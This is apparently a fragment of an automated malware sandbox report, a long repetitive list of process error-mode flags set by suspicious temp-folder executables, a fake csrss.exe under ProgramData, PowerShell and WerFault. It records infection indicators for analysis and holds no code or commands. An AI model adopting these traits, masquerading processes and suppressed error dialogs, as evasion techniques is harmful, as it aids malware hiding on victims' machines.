                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
